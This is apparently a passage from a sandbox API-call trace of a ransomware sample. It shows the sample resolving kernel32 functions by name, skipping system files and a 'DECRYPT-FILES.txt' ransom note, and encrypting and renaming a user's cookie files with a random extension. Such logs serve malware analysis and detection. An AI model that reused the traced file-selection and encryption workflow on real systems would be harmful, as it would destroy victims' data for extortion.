lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.536] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.537] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.537] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.537] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.537] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.537] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.537] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.537] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.537] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.537] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.537] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.537] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.537] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.537] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.537] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.537] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.537] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.537] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.537] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.538] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.538] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.538] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt") returned 107 [0079.538] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq") returned 113 [0079.538] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt.67drq"), dwFlags=0x0) returned 1 [0079.538] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.539] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.539] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.539] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5348e0b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5348e0b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5348e0b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", cAlternateFileName="5P5NRG~4.TXT")) returned 1 [0079.539] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.539] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="autorun.inf") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="boot.ini") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="desktop.ini") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="ntuser.dat") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="iconcache.db") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="bootsect.bak") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="thumbs.db") returned -1 [0079.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", lpString2="Bootfont.bin") returned -1 [0079.540] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt") returned 45 [0079.540] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.540] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.540] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.540] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.540] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt") returned 45 [0079.540] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" [0079.540] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.541] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=206) returned 1 [0079.541] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.541] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.541] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.541] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.541] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.543] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.543] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.544] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.544] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.544] CloseHandle (hObject=0x464) returned 1 [0079.544] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.544] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.545] CloseHandle (hObject=0x0) returned 0 [0079.545] CloseHandle (hObject=0x460) returned 1 [0079.546] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.546] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.546] GetTickCount () returned 0x114c60e [0079.546] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.547] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.547] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.547] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.547] lstrlenA (lpString="kernel32.dll") returned 12 [0079.547] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.547] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.547] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.547] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.548] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.548] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.548] lstrlenA (lpString="ADDATOMA") returned 8 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.548] lstrlenA (lpString="ADDATOMW") returned 8 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.548] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.548] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.548] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.548] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.548] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.548] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.548] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.548] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.548] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.548] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.548] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.548] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.548] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.548] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.548] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.549] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.549] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.549] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.549] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.549] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.549] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.549] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.549] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.549] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.549] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.549] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.549] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.549] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.549] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.549] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.549] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.549] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.550] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.550] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.550] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.550] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.550] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.550] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.550] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.550] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.550] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.550] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.550] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.550] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.550] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.550] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.550] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.550] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.550] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.550] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.550] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.550] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.551] lstrlenA (lpString="BEEP") returned 4 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.551] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.551] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.551] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.551] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.551] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.551] lstrcpyA (in: lpString1=0x3f2c7fc, 